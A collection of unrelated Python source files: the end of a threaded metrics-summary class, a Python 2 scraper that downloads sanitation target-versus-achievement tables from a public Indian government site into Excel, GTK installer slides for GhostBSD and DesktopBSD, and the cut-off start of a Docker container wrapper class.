if rows are too long... def flush(self): try: summary = self._summarize() except ValueError: pass else: self.interface.publish_summary(summary) def start(self) -> None: if self._thread is None: self._shutdown = False self._thread = threading.Thread(target=self._thread_body) self._thread.name = "SummaryThread" self._thread.daemon = True if not self._thread.is_alive(): self._thread.start() def shutdown(self) -> None: self._shutdown = True try: if self._thread is not None: self._thread.join() finally: self._thread = None def _thread_body(self) -> None: while True: self.flush() # debouncing seconds = 0 while seconds < self.DEBOUNCE_SECONDS: time.sleep(1) seconds += 1 if self._shutdown: self.flush() return if __name__ == "__main__": netsted = NestedDict() netsted["a"]["b"]["c"]["d"] = 0.3 netsted.update({"a": {"b": {"d": 0.1}}}) netsted.flatten() netsted.update({"b": 3}) netsted.flatten() summary = Summary() summary.update({"a": {"b": {"d": 0.1}}}) summary.update({"a": {"b": {"d": 0.2}}}) summary.update({"a": {"b": {"d": 0.3}}}) summary.update({"a": {"b": {"d": 0.4}}}) summary.update({"a": {"b": {"d": 0.5}}}) summary = Summary() summary.update({"loss": 0.1, "ttt": 0.5}) summary.update({"loss": 0.2, "ttt": 0.4}) summary.update({"loss": 0.3, "ttt": 0.3}) summary.update({"loss": 0.4, "ttt": 0.2}) summary.update({"loss": 0.5, "ttt": 0.1}) print(summary.summarize())
SBM_TargetVsAchievement_Data_Script.py
import ctypes # for popup window import sys # for exception information try: # Main exception handler import requests # for HTTP requests from bs4 import BeautifulSoup # for HTML parsing import bs4 # for type checking import xlsxwriter # for exporting to Excel - need xlsx as over 200k rows of data import os # to find user's desktop path import time # for adding datestamp to file output import Queue # for multithreading import threading # for multithreading # Timing the script startTime = time.time() # Configuration of request variables url_SBM_TargetVsAchievement = 'http://sbm.gov.in/sbmreport/Report/Physical/SBM_TargetVsAchievement.aspx' stateKey = 'ctl00$ContentPlaceHolder1$ddlState' stateVal = '' districtKey = 'ctl00$ContentPlaceHolder1$ddlDistrict' districtVal = '' blockKey = 'ctl00$ContentPlaceHolder1$ddlBlock' blockVal = '' submitKey = 'ctl00$ContentPlaceHolder1$btnSubmit' submitVal = 'View Report' targetKey = '__EVENTTARGET' targetVal = '' # __EVENTVALIDATION and __VIEWSTATE are dynamic authentication values which must be freshly updated when making a request. eventValKey = '__EVENTVALIDATION' eventValVal = '' viewStateKey = '__VIEWSTATE' viewStateVal = '' # Queue for multithreading myQueue = Queue.Queue() # Function to return HTML parsed with BeautifulSoup from a POST request URL and parameters. def parsePOSTResponse(URL, parameters=''): responseHTMLParsed = '' attempts = 20 for i in range(attempts): r = requests.post(URL, data=parameters) if r.status_code == 200: responseHTML = r.content responseHTMLParsed = BeautifulSoup(responseHTML, 'html.parser') if not responseHTMLParsed == '': return responseHTMLParsed else: print (" Could not load page - attempt %s out of %s" % (i+1, attempts)) # Threading def threaded(f, daemon=False): def wrapped_f(q, *args, **kwargs): '''this function calls the decorated function and puts the result in a queue''' ret = f(*args, **kwargs) q.put(ret) def wrap(*args, **kwargs): '''this is the function returned from the decorator. It fires off wrapped_f in a new thread and returns the thread object with the result queue attached''' q = Queue.Queue() t = threading.Thread(target=wrapped_f, args=(q,)+args, kwargs=kwargs) t.daemon = daemon t.start() t.result_queue = q return t return wrap # Function to read the data in an individual block report @threaded def readBlockReport(URL, blockIndex, parameters='',): page = parsePOSTResponse(URL, parameters) # Process table data and output blockReportTable = page.find('table') if isinstance(blockReportTable,bs4.element.Tag): # Check whether data table successfully found on the page. Some blocks have no data. # Store table for writing headers after loop lastBlockReportTable = blockReportTable # Store state, district, and block information stateNameText = blockReportTable.find('span',{'id':'ctl00_ContentPlaceHolder1_Rpt_data_ctl00_lblstatename'}).text stateNameText = stateNameText.replace('State Name:-',''); stateNameText = stateNameText.strip(); districtNameText = blockReportTable.find('span',{'id':'ctl00_ContentPlaceHolder1_Rpt_data_ctl00_lbldtname'}).text districtNameText = districtNameText.replace('District Name:-',''); districtNameText = districtNameText.strip(); blockNameText = blockReportTable.find('span',{'id':'ctl00_ContentPlaceHolder1_Rpt_data_ctl00_lblblname'}).text blockNameText = blockNameText.replace('Block Name:-',''); blockNameText = blockNameText.strip(); # Loop through rows and write data into array to be returned #print ('Currently processing: ' + stateNameText + ' (' + str(stateCount) + ' of ' + str(len(stateOptionVals)) + ')' + ' > ' + districtNameText + ' (' + str(districtCount) + ' of ' + str(len(districtOptionVals)) + ')' + ' > ' + blockNameText + ' (' + str(blockIndex) + ' of ' + str(len(blockOptionVals)) + ')') blockReportRows = blockReportTable.find('tbody').findAll('tr') # Only process table body data tableArray = [] for tr in blockReportRows[0:len(blockReportRows)-1]: # Total row (bottom of table) dropped tableRow = [] cols = tr.findAll('td') # Write state, district, and block information tableRow.append(stateNameText) tableRow.append(districtNameText) tableRow.append(blockNameText) for td in cols: # Tidy and format the cell content cellText = td.text.replace('\*','') cellText = cellText.strip() try: int(cellText) cellText = int(cellText) except: cellText = cellText # Store the cell data tableRow.append(cellText) # TableArray.append(tableRow) # Try writing row at once #rowCount = rowCount + 1 tableArray.append(tableRow) return tableArray else: return -1 # print ('No data for: ' + stateNameText + ' (' + str(stateCount) + ' of ' + str(len(stateOptionVals)) + ')' + ' > ' + districtNameText + ' (' + str(districtCount) + ' of ' + str(len(districtOptionVals)) + ')' + ' > block (' + str(blockCount) + ' of ' + str(len(blockOptionVals)) + ')') # Load the default page and scrape the state and authentication values initPage = parsePOSTResponse(url_SBM_TargetVsAchievement) eventValVal = initPage.find('input',{'id':'__EVENTVALIDATION'})['value'] viewStateVal = initPage.find('input',{'id':'__VIEWSTATE'})['value'] stateOptions = [] stateOptionVals = [] stateSelection = initPage.find('select',{'id':'ctl00_ContentPlaceHolder1_ddlState'}) stateOptions = stateSelection.findAll('option',{'selected':''}) for stateOption in stateOptions: if 'All State' not in stateOption.text: stateOptionVal = stateOption['value'] stateOptionVals.append(stateOptionVal) # Initialise workbook todaysDate = time.strftime('%d-%m-%Y') desktopFile = os.path.expanduser('~/Desktop/SBM_TargetVsAchievement_' + todaysDate + '.xlsx') wb = xlsxwriter.Workbook(desktopFile) ws = wb.add_worksheet('SBM Test') ws.set_column('A:AZ', 22) rowCount = 1 # Adjust one row for printing table headers after main loop cellCount = 0 # Global variable to store final table data lastBlockReportTable = '' # Global variabless for keeping track of the state and GP stateCount = 1 blockCount = 1 GPCount = 0 # Data to be written into the file at the end of the loop fileOutput = [] # MAIN LOOP: loop through STATE values and scrape district and authentication values for each for stateOptionVal in stateOptionVals[:2]: # For testing, we can limit the states processed due to long runtime postParams = { eventValKey:eventValVal, viewStateKey:viewStateVal, stateKey:stateOptionVal, districtKey:'-1', blockKey:'-1', targetKey:'ctl00$ContentPlaceHolder1$ddlState' } statePage = parsePOSTResponse(url_SBM_TargetVsAchievement, postParams) state_eventValVal = statePage.find('input',{'id':'__EVENTVALIDATION'})['value'] state_viewStateVal = statePage.find('input',{'id':'__VIEWSTATE'})['value'] districtOptions = [] districtOptionVals = [] districtSelection = statePage.find('select',{'id':'ctl00_ContentPlaceHolder1_ddlDistrict'}) districtOptions = districtSelection.findAll('option',{'selected':''}) allBlocks = [] for districtOption in districtOptions: if 'All District' not in districtOption.text and 'STATE HEADQUARTER' not in districtOption.text: # We do not want the top level data for the state or state headquarter data districtOptionVal = districtOption['value'] districtOptionVals.append(districtOptionVal) # Loop through the DISTRICT values and scrape block and authentication values for each districtCount = 1 blockResultsArray = [] for districtOptionVal in districtOptionVals: state_postParams = { eventValKey:state_eventValVal, viewStateKey:state_viewStateVal, stateKey:stateOptionVal, districtKey:districtOptionVal, blockKey:'-1', targetKey:'ctl00$ContentPlaceHolder1$ddlDistrict' } districtPage = parsePOSTResponse(url_SBM_TargetVsAchievement, state_postParams) district_eventValVal = districtPage.find('input',{'id':'__EVENTVALIDATION'})['value'] district_viewStateVal = districtPage.find('input',{'id':'__VIEWSTATE'})['value'] blockOptions = [] blockOptionVals = [] blockSelection = districtPage.find('select',{'id':'ctl00_ContentPlaceHolder1_ddlBlock'}) blockOptions = blockSelection.findAll('option',{'selected':''}) for blockOption in blockOptions: if 'All Block' not in blockOption.text: # We do not want the top level data for the block blockOptionVal = blockOption['value'] blockOptionVals.append(blockOptionVal) # Loop through the BLOCK values and request the report for each for blockOptionVal in blockOptionVals: block_postParams = { eventValKey:district_eventValVal, viewStateKey:district_viewStateVal, stateKey:stateOptionVal, districtKey:districtOptionVal, blockKey:blockOptionVal, submitKey:submitVal } # Multithreading: Try and call all of the block report tables ofr a block in parallel allBlocks.append(readBlockReport(url_SBM_TargetVsAchievement, blockCount, block_postParams)) blockCount = blockCount + 1 blockCount = 1 result = [] for block in allBlocks: GPs = block.result_queue.get() if not GPs == -1: result.append(GPs) for r in range(len(GPs)): print ('Currently processing: ' + GPs[r][0] + ' (' + str(stateCount) + ' of ' + str(len(stateOptionVals)) + ')' + ' > ' + GPs[r][1] + ' (' + str(districtCount) + ' of ' + str(len(districtOptionVals)) + ')' + ' > ' + GPs[r][2] + ' (' + str(r + 1) + ' of ' + str(len(GPs)) + ')' + ' > ' + str(GPs[r][4])) blockResultsArray.append(result) fileOutput.append(blockResultsArray) # Wait for multithreading to finish districtCount = districtCount + 1 stateCount = stateCount + 1 # Write table headers based on final report # print ('Processing table headers...') # blockReportHeaderRows = lastBlockReportTable.find('thead').findAll('tr') # Only process table header data # headerTableArray = [] # rowCount = 0 # cellCount = 0 # headerStyle = wb.add_format({'bold': True, 'font_color': 'white', 'bg_color': '#0A8AD5'}) # for tr in blockReportHeaderRows[len(blockReportHeaderRows)-2:len(blockReportHeaderRows)-1]: # State, district, and block (bottom of table) + other headers dropped # headerTableRow = [] # headerCols = tr.findAll('th') # # Write state, district, and block headers # ws.write(rowCount,cellCount,'State Name',headerStyle) # cellCount = cellCount+1 # ws.write(rowCount,cellCount,'District Name',headerStyle) # cellCount = cellCount+1 # ws.write(rowCount,cellCount,'Block Name',headerStyle) # cellCount = cellCount+1 # for td in headerCols: # # Tidy the cell content # cellText = td.text.replace('\*','') # cellText = cellText.strip() # # Store the cell data # headerTableRow.append(cellText) # ws.write(rowCount,cellCount,cellText,headerStyle) # cellCount = cellCount+1 # #headerTableArray.append(tableRow) # rowCount = rowCount + 1 # cellCount = 0 print ('Done processing.' + ' Script executed in ' + str(int(time.time()-startTime)) + ' seconds.') # END MAIN LOOP # Write all data into the file r = 0 for b in blockResultsArray: for c in b: for d in c: ws.write_row(r, 0, d) r = r + 1 # Finally, save the workbook wb.close() except: # Main exception handler print('The program did not complete.') e = sys.exc_info() ctypes.windll.user32.MessageBoxW(0, "Sorry, there was a problem running this program.\n\nFor developer reference:\n\n" + str(e), "The program did not complete :-/", 1)
slides.py
#!/usr/bin/env python import gi gi.require_version('Gtk', '3.0') from gi.repository import Gtk, Gdk, GLib import threading from time import sleep import sys import os installer = "/usr/local/lib/gbi/" rcconfgbsd = "/etc/rc.conf.ghostbsd" rcconfdbsd = "/etc/rc.conf.desktopbsd" sys.path.append(installer) cssProvider = Gtk.CssProvider() #if os.path.exists(rcconfgbsd): # print(True) cssProvider.load_from_path('/usr/local/lib/gbi/ghostbsd-style.css') #elif os.path.exists(rcconfdbsd): # cssProvider.load_from_path('/usr/local/lib/gbi/desktopbsd-style.css') screen = Gdk.Screen.get_default() styleContext = Gtk.StyleContext() styleContext.add_provider_for_screen(screen, cssProvider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION) class gbsdSlides: def Welcome(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Welcome to GhostBSD!", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="welcome") hBox.show() vBox.pack_end(hBox, True, True, 0) vBox2 = Gtk.VBox(False, 0) vBox2.show() label2 = Gtk.Label(name="slideText") label2.set_markup("Thank you for choosing GhostBSD. We hope you enjoy the BSD experience.\n\n" "We believe every computer Operating System should be elegant, lightweight, and secure. It should respect your privacy and give the user true freedom. GhostBSD makes FreeBSD desktop computing much easier.\n\n" "We want GhostBSD to work for you. So while your software is installing, this slideshow will introduce you to GhostBSD.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) # label2.set_max_width_chars(10) label2.set_alignment(0.0, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def Software(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Install more software ", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="software") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("Search, install, upgrade, and uninstall software with OctoPkg software manager.\n\n" "OctoPkg is a powerful tool to manage GhostBSD/FreeBSD software. It has a simple interface which consists of just 2 panels, a list of all available software including results of searches and a tab widget showing 6 useful tabs for information, files, transaction, output, news, and a quick help guide.\n\n" "There are over 25000 software packages available to install.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def TheWeb(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Make the most of the web", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="web") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("GhostBSD includes Mozilla Firefox, the web browser used by millions of people around the world.\n\n" "Browse the web safely and privately, share your files, software, and multimedia, send and receive e-mail, and communicate with friends and family.\n\n" "Web browsers such as Chromium and Epiphany are easily installable.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def email(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Make the most of the web", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="web") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("GhostBSD includes Mozilla Firefox, the web browser used by millions of people around the world.\n\n" "Browse the web safely and privately, share your files, software, and multimedia, send and receive e-mail, and communicate with friends and family.\n\n" "Web browsers such as Chromium and Epiphany are easily installable.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def Photos(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label(name="Header") label.set_markup('Organize, retouch, and share your photos') label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="photo") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("With Shotwell, it is really easy to organize and share your photos\n\n" "Use the Export option to copy your photos to a remote computer, iPod, a custom HTML gallery, or to export to services such as Flickr, Facebook, PicasaWeb, and more.\n\n" "For more advanced photos editing, Gimp is available for installation.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def MultiMedia(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Play your movies and music", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="mutimedia") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("GhostBSD is ready to play videos and music from the web, CDs and DVDs.\n\n" "Exaile audio player lets you organize your music and listen to Internet radio, podcasts, and more, as well as synchronizes your audio collection to a portable audio player.\n\n" "\nGnome MPlayer allows you to easily watch videos from your computer, DVD.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def communicate(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Play your movies and music", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="communicate") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("GhostBSD is ready to play videos and music from the web, CDs and DVDs.\n\n" "Exaile audio player lets you organize your music and listen to Internet radio, podcasts, and more, as well as synchronizes your audio collection to a portable audio player.\n\n" "Gnome MPlayer allows you to easily watch videos from your computer, DVD.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def Help(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Help & Support", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="help") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("Check out the forums for answers to all your GhostBSD questions.\n\n" "There's a good chance your question will have been answered already and, if not, you'll find volunteers eager to help.\n\n" "For more support options, go to our <a href='http://www.ghostbsd.org/support'>support page</a>.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def SlideRight(self): if self.stack.get_visible_child() == self.welcome: self.stack.set_visible_child(self.software) elif self.stack.get_visible_child() == self.software: self.stack.set_visible_child(self.web) elif self.stack.get_visible_child() == self.web: self.stack.set_visible_child(self.photos) elif self.stack.get_visible_child() == self.photos: self.stack.set_visible_child(self.multimedia) elif self.stack.get_visible_child() == self.multimedia: self.stack.set_visible_child(self.help) elif self.stack.get_visible_child() == self.help: self.stack.set_visible_child(self.welcome) def __init__(self): self.hBox = Gtk.HBox(False, 0) self.hBox.show() self.stack = Gtk.Stack() self.hBox.add(self.stack) # Adding slide self.grid in to stack self.welcome = self.Welcome() self.stack.add_named(self.welcome, "welcome") self.software = self.Software() self.stack.add_named(self.software, "software") self.web = self.TheWeb() self.stack.add_named(self.web, "web") self.photos = self.Photos() self.stack.add_named(self.photos, "photos") self.multimedia = self.MultiMedia() self.stack.add_named(self.multimedia, "multimedia") self.help = self.Help() self.stack.add_named(self.help, "help") self.stack.set_transition_type(Gtk.StackTransitionType.SLIDE_LEFT) self.stack.show() thr = threading.Thread(target=self.slidesThreading) thr.setDaemon(True) thr.start() def get_slide(self): return self.hBox def slidesThreading(self): while 1: sleep(60) GLib.idle_add(self.SlideRight) class dbsdSlides: def Welcome(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Welcome to DesktopBSD!", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="welcome") hBox.show() vBox.pack_end(hBox, True, True, 0) vBox2 = Gtk.VBox(False, 0) vBox2.show() label2 = Gtk.Label(name="slideText") label2.set_markup("Thank you for choosing DesktopBSD. We hope you enjoy the BSD experience.\n\n" "We believe every computer Operating System should be elegant, lightweight, and secure. It should respect your privacy and give the user true freedom. DesktopBSD makes FreeBSD desktop computing much easier.\n\n" "We want DesktopBSD to work for you. So while your software is installing, this slideshow will introduce you to DesktopBSD.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) # label2.set_max_width_chars(10) label2.set_alignment(0.0, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def Software(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Install more software ", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="software") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("Search, install, upgrade, and uninstall software with OctoPkg software manager.\n\n" "OctoPkg is a powerful tool to manage DesktopBSD/FreeBSD software. It has a simple interface which consists of just 2 panels, a list of all available software including results of searches and a tab widget showing 6 useful tabs information, files, transaction, output, news, and a quick help guide.\n\n" "There are over 25000 softwares available to install.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def TheWeb(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Make the most of the web", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="web") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("DesktopBSD includes the BSD licensed Chromium web browser from Google.\n\n" "Check out the Chrome Web Store for more apps to install in addition to the ones provided by DesktopBSD/FreeBSD.\n\n" "Web browsers such as Firefox and Epiphany are easily installable.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def email(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Make the most of the web", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="web") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("DesktopBSD includes Mozilla Thunderbird.\n\n" "Share your files, software, and multimedia, send and receive e-mail, and communicate with friends and family.\n\n" "Other email clients such as Evolution are easily installable.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def Photos(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label(name="Header") label.set_markup('Organize, retouch, and share your photos') label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="photo") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("With Shotwell, it is really easy to organize and share your photos\n\n" "Use the Export option to copy your photos to a remote computer, iPod, a custom HTML gallery, or to export to services such as Flickr, Facebook, PicasaWeb, and more.\n\n" "For more advanced photos editing, Gimp is available for installation.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def MultiMedia(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Play your movies and musics", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="mutimedia") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("DesktopBSD is ready to play videos and music from the web, CDs and DVDs.\n\n" "Exaile audio player lets you organize your music and listen to Internet radio, podcasts, and more, as well as synchronizes your audio collection to a portable audio player.\n\n" "\nVLC allows you to easily watch videos from your computer, DVD.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def communicate(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Play your movies and musics", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="communicate") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("DesktopBSD is setup to connect you to the world.\n\n" "Hexchat can be used to connect you to the DesktopBSD chat room on IRC.\n\n" "Pidgin can connect you to many popular instant messaging networks including Facebook.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def Help(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Help & Support", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="help") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("Check out the forums for answers to all your DesktopBSD questions.\n\n" "There's a good chance your question will have been answered already and, if not, you'll find volunteers eager to help.\n\n" "For more support options, go to our <a href='http://www.desktopbsd.net'>website</a>.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def SlideRight(self): if self.stack.get_visible_child() == self.welcome: self.stack.set_visible_child(self.software) elif self.stack.get_visible_child() == self.software: self.stack.set_visible_child(self.web) elif self.stack.get_visible_child() == self.web: self.stack.set_visible_child(self.photos) elif self.stack.get_visible_child() == self.photos: self.stack.set_visible_child(self.multimedia) elif self.stack.get_visible_child() == self.multimedia: self.stack.set_visible_child(self.help) elif self.stack.get_visible_child() == self.help: self.stack.set_visible_child(self.welcome) def __init__(self): self.hBox = Gtk.HBox(False, 0) self.hBox.show() self.stack = Gtk.Stack() self.hBox.add(self.stack) # Adding slide self.grid in to stack self.welcome = self.Welcome() self.stack.add_named(self.welcome, "welcome") self.software = self.Software() self.stack.add_named(self.software, "software") self.web = self.TheWeb() self.stack.add_named(self.web, "web") self.photos = self.Photos() self.stack.add_named(self.photos, "photos") self.multimedia = self.MultiMedia() self.stack.add_named(self.multimedia, "multimedia") self.help = self.Help() self.stack.add_named(self.help, "help") self.stack.set_transition_type(Gtk.StackTransitionType.SLIDE_LEFT) self.stack.show() thr = threading.Thread(target=self.slidesThreading) thr.setDaemon(True) thr.start() def get_slide(self): return self.hBox def slidesThreading(self): while 1: sleep(60) GLib.idle_add(self.SlideRight)
container.py
""" Representation of a generic Docker container """ import logging import tarfile import tempfile import threading import docker import requests from docker.errors import NotFound as DockerNetworkNotFound from samcli.lib.utils.retry import retry from .exceptions import ContainerNotStartableException from .utils import to_posix_path, find_free_port, NoFreePortsError LOG = logging.getLogger(__name__) class ContainerResponseException(Exception): """ Exception raised when unable to communicate with RAPID APIs on a running container. """ class Container: """ Represents an instance of a Docker container with a specific configuration. The container is not actually created or executed until the appropriate methods are called. Each container instance is uniquely identified by an ID that the Docker Daemon creates when the container is started. NOTE: This class does not download container images. It should be pulled separately and made available before creating a container with this class """ # This frame type value is coming directly from Docker Attach Stream API spec _STDOUT_FRAME_TYPE = 1 _STDERR_FRAME_TYPE = 2 RAPID_PORT_CONTAINER = "8080" URL = "http://localhost:{port}/2015-03-31/functions/{function_name}/invocations" # Set connection timeout to 1 sec to support the large input. RAPID_CONNECTION_TIMEOUT = 1 def __init__( self, image, cmd, working_dir, host_dir, memory_limit_mb=None, exposed_ports=None, entrypoint=None, env_vars=None, docker_client=None, container_opts=None, additional_volumes=None, ): """ Initializes the class with given configuration. This does not automatically create or run the container. :param string image: Name of the Docker image to create container with :param string working_dir: Working directory for the container :param string host_dir: Directory in the host operating system that should be mounted to the ``working_dir`` on container :param list cmd: Command to pass to container :param int memory_limit_mb: Optional. Max limit of memory in MegaBytes this Lambda function can use. :param dict exposed_ports: Optional. Dict of ports to expose :param list entrypoint: Optional. Entry point process for the container. Defaults to the value in Dockerfile :param dict env_vars: Optional. Dict of environment variables to setup in the container """ self._image = image self._cmd = cmd self._working_dir = working_dir self._host_dir = host_dir self._exposed_ports = exposed_ports self._entrypoint = entrypoint self._env_vars = env_vars 